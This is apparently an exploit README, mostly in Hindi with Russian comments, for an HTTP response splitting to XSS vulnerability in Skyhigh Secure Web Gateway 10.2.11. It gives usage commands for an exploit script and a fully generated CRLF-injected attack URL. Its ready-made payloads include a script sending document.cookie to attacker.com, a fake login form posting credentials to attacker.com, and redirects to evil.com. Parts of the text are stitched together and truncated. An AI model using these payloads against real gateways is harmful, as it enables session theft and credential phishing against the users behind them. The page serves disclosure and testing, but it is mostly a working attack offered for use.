
सुरक्षित वेब गेटवे 10.2.11 - क्रॉस-साइट स्क्रिप्टिंग (XSS)
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝
by 0PTS
Skyhigh Secure Web Gateway (पूर्व में McAfee Web Gateway) में HTTP Response Splitting भेद्यता के लिए Proof of Concept।
Skyhigh Secure Web Gateway में एक महत्वपूर्ण HTTP Response Splitting भेद्यता, जो मनमाने HTML/JavaScript कोड के इंजेक्शन के माध्यम से दूरस्थ रूप से XSS हमलों को निष्पादित करने की अनुमति देती है।
भेद्यता "Ssos" प्लगइन (क्रिया SetLoginToken) में है, जो URL पैरामीटर को गलत तरीके से संसाधित करता है:
चूंकि न्यूलाइन वर्ण (\r\n / %0d%0a) एस्केप नहीं किए जाते, हमलावर यह कर सकता है:
Content-Type और Content-Length को ओवरराइड करनाब्राउज़र सही ढंग से निर्मित Content-Length के बाद शेष प्रतिक्रिया सामग्री को अनदेखा करता है, जो प्रदर्शित सामग्री को पूरी तरह से बदलने की अनुमति देता है।
python explot.py
# Базовый XSS
python explot.py -d example.com -p "<script>alert(document.domain)</script>"
# Редирект
python explot.py -d target.com -p '<meta http-equiv="refresh" content="0;url=https://evil.com/">'
# Фишинг форма
python explot.py -d bank.com -p '<form action="https://evil.com/steal"><input name="pass" placeholder="Password"><button>Login</button></form>'
# Только URL (тихий режим)
python explot.py -d example.com -p "<script>alert(1)</script>" -q
-d, --domain लक्ष्य डोमेन (डिफ़ॉल्ट: google.com)
-x, --prefix URL पथ उपसर्ग (डिफ़ॉल्ट: SWG internal path)
-p, --payload HTML/JavaScript payload
-q, --quiet शांत मोड - केवल URL
-v, --version स्क्रिप्ट का संस्करण
-h, --help सहायता
<script>fetch('https://attacker.com/log?c='+document.cookie)</script>
<html>
<body style="font-family:Arial">
<h2>Session Expired - Please Login Again</h2>
<form action="https://attacker.com/phish" method="POST">
<input type="text" name="user" placeholder="Username"><br>
<input type="password" name="pass" placeholder="Password"><br>
<button>Login</button>
</form>
</body>
</html>
<meta http-equiv="refresh" content="0;url=https://malicious-site.com/">
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝
[+] Target Domain: example.com
[+] Payload Length: 43 bytes
[+] URL Length: 234 chars
[+] Generated URL:
http://example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=1&c=1&p=p%0D%0AContent-Type%3A%20text%2Fhtml%3Bcharset%3Dutf-8%0D%0AContent-Length%3A%2043%0D%0A%0D%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/mwg-internal/* के संदिग्ध अनुरोधों की निगरानी करें⚠️ चेतावनी: यह उपकरण केवल इसके लिए है:
मालिक की स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध उपयोग अवैध है।
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝